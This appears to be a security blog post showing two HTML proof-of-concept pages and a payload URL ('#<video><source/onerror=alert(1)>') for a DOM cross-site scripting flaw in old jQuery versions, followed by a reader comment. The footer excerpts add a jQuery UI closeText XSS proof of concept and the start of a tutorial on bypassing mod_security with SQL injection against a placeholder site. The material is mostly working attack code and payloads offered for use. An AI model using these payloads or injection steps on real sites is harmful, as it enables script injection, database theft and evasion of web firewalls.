Location.Hash exploit || JQuery 1.11.3/1.7.2/1.6.1 Cross Site Scripting

This is the code for exploiting (location.hash) JQuery for Cross Site Scripting:

<html>
    <head>

         <title>Jquery XSS Test 1</title>

                <script type="text/javascript"                        
                    src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js">
                </script>

                <script>
                   $(location.hash.split('#')[1]);
                </script>

   </head>
     <body>
        Jquery DOM XSS
    </body>
</html>

OR,

<html>
    <head>

         <title>Jquery XSS Test 2</title>

                <script type="text/javascript"                        
                    src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js">
                </script>

                <script>
                   $(location.hash);
                </script>

   </head>
     <body>
        Jquery DOM XSS
    </body>
</html>


Now, use this HTML page with file:///C:/Jquery.html#<video><source/onerror=alert(1)>


Bingo!!!!!

Comments

  1. Sheik Nizamuddin7:27 am, July 29, 2016

    Hi Jatin,

    Nice post.

    I tried the same steps and did not seem to work. Is it fixed already?

    Thanks

    ReplyDelete

Post a Comment

Popular posts from this blog

JQuery UI 1.11.4 Cross Site Scripting

Vulnerability name: XSS Reflected JQuery UI 1.11.4  I think nearly everyone gets shocked, when your Acunetix shows Cross Site Scripting in Jquery UI. But, may be many of you don’t know how to exploit it. So, here is a Code which will explain how to exploit vulnerabilities like these. Place the script on dialog function as shown in the Code below. <!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml"> <head>     <title>XSS in closeText option of component ui dialog</title>     <script src="https://code.jquery.com/jquery-2.1.4.js"></script>     <script src="https://code.jquery.com/ui/1.11.4/jquery-ui.js"></script>       <script>         $(document).ready(function () {             $('#dialog').dialog({ closeText: ' <script>alert("XSS")<\/script> ' });         });     </script> </head> <body>   
Read more

Bypass Mod_Security

Image
This topic is similar as Manual Sql Injection. But mod_security are protect to hack website. You can see in this screenshot. Now In this tutorial we can learn how to bypass mod_security First we need one Target Website In My case I am using this website: http://www.target.com.pk Finding The Amount Of Columns Now that you found a vulnerable site, you need to find the amount of columns. You can do this by using the "Order By" function. Your link should now look like this: Code: http://www.target.com.pk/pages.php?ID=18 order by 1--+ (no error) http://www.target.com.pk/pages.php?ID=18 order by 2--+ (no error) http://www.target.com.pk/pages.php?ID=18 order by 3--+ (no error) http://www.target.com.pk/pages.php?ID=18 order by 4--+ (no error) http://www.target.com.pk/pages.php?ID=18 order by 5--+ (no error) http://www.target.com.pk/pages.php?ID=18 order by 6--+ (error) Finding Vulnerable Columns So now that you got the amount of columns, you're going to want to see
Read more